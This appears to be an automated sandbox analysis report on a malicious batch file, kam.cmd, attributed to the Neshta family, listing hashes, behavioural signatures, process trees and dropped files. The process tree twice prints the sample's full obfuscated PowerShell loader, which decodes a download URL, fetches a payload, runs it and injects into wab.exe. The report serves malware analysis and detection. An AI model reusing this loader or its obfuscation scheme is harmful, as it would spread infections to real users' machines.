Analysis
-
max time kernel
193s -
max time network
255s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
23-05-2024 18:05
General
-
Target
kam.cmd
-
Size
6KB
-
MD5
c7b720a0f6bffebe027826a2508c52dc
-
SHA1
41b21cdcd0afd9363d1c79202d687c65fc6128b4
-
SHA256
c67dbe7d1bfb36fcab8391ea0728382445c106fb08ad19f9a3fb3777cdef5562
-
SHA512
4e519b29716116807d312aa87453f57eca6893dc84fb4a761ac569c240b5ef617854f6f14a1bcac00ebf9e142ecb0d9d437d48a3542f5cae5bf6d09e5050c199
-
SSDEEP
96:549QmKe2Eb8DxZzthv2iDf8r0dMxmr8BhG+ZmrJ2iCzs:5Le2BYPSE5dlzs
Score
10/10
Malware Config
Signatures
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Blocklisted process makes network request 5 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Modifies system executable filetype association 2 TTPs 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 57 IoCs
-
Drops file in Windows directory 1 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\kam.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Modifies system executable filetype association
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXEFilesize
86KB
MD511d708487ad1f49c907471923fa443ba
SHA1be6b51cda8ced1a6e0e4cdfc4f73fc094c1777e8
SHA2564c750a058e8083c2b5a69a93cd5a2dddb2302343545c91f0aee851d9cfb39c44
SHA5127f3291cb2650820291e8e56cf331d0b8161b2a89a9acf369448a9854869202571115a840953bd058985e7b3413048f882f61fd92df2dafd8d1e35b28578facbd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fs5t3tts.v4c.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\Klavers.UenFilesize
454KB
MD5595a09748ec54d46958b4fc48e232e43
SHA1a1c64c8815eda873408f9e6d51519f46ccd9b6b0
SHA256c5179f092dcc764d1869e5fdb1a667032c0ef1a6c9de4b7d1ad30126b2c47a65
SHA51283da041c266fb9286a2226a04740310e3cafadcca968b4dfac1494db111ac3f54580763af6e4c1a128cbb4363197dd85d26895c1dddb4bdb46daac151fc5038f
-
memory/648-71-0x00000000091A0000-0x00000000091BA000-memory.dmpFilesize
104KB
-
memory/648-318974-0x0000000073E80000-0x000000007456E000-memory.dmpFilesize
6.9MB
-
memory/648-77-0x0000000009490000-0x00000000094B2000-memory.dmpFilesize
136KB
-
memory/648-378997-0x0000000073E80000-0x000000007456E000-memory.dmpFilesize
6.9MB
-
memory/648-44-0x0000000073E8E000-0x0000000073E8F000-memory.dmpFilesize
4KB
-
memory/648-45-0x0000000004860000-0x0000000004896000-memory.dmpFilesize
216KB
-
memory/648-47-0x0000000007570000-0x0000000007B98000-memory.dmpFilesize
6.2MB
-
memory/648-46-0x0000000073E80000-0x000000007456E000-memory.dmpFilesize
6.9MB
-
memory/648-76-0x0000000009500000-0x0000000009594000-memory.dmpFilesize
592KB
-
memory/648-49-0x0000000007270000-0x0000000007292000-memory.dmpFilesize
136KB
-
memory/648-50-0x0000000007310000-0x0000000007376000-memory.dmpFilesize
408KB
-
memory/648-51-0x0000000007BA0000-0x0000000007C06000-memory.dmpFilesize
408KB
-
memory/648-52-0x0000000007D00000-0x0000000008050000-memory.dmpFilesize
3.3MB
-
memory/648-53-0x0000000007440000-0x000000000745C000-memory.dmpFilesize
112KB
-
memory/648-54-0x0000000008560000-0x00000000085AB000-memory.dmpFilesize
300KB
-
memory/648-55-0x0000000008300000-0x0000000008376000-memory.dmpFilesize
472KB
-
memory/648-70-0x0000000009A60000-0x000000000A0D8000-memory.dmpFilesize
6.5MB
-
memory/648-318971-0x0000000073E8E000-0x0000000073E8F000-memory.dmpFilesize
4KB
-
memory/648-48-0x0000000073E80000-0x000000007456E000-memory.dmpFilesize
6.9MB
-
memory/648-78-0x000000000A5E0000-0x000000000AADE000-memory.dmpFilesize
5.0MB
-
memory/648-88-0x000000000AAE0000-0x000000000CFAE000-memory.dmpFilesize
36.8MB
-
memory/4852-379110-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/4852-7-0x00000273F0480000-0x00000273F04A2000-memory.dmpFilesize
136KB
-
memory/4852-80-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/4852-246-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/4852-87-0x00007FFE8F503000-0x00007FFE8F504000-memory.dmpFilesize
4KB
-
memory/4852-14-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/4852-5-0x00007FFE8F503000-0x00007FFE8F504000-memory.dmpFilesize
4KB
-
memory/4852-13-0x00000273F0990000-0x00000273F0A06000-memory.dmpFilesize
472KB
-
memory/4852-33-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/4852-12-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/69300-379121-0x0000000003200000-0x0000000004583000-memory.dmpFilesize
19.5MB
-
memory/69300-379123-0x0000000003200000-0x0000000004583000-memory.dmpFilesize
19.5MB
-
memory/69300-337579-0x0000000003200000-0x0000000004583000-memory.dmpFilesize
19.5MB
-
memory/69300-379119-0x0000000003200000-0x0000000004583000-memory.dmpFilesize
19.5MB
-
memory/69300-379120-0x0000000003200000-0x0000000004583000-memory.dmpFilesize
19.5MB
-
memory/69300-379055-0x0000000003200000-0x0000000004583000-memory.dmpFilesize
19.5MB
-
memory/69300-318972-0x0000000003200000-0x0000000004583000-memory.dmpFilesize
19.5MB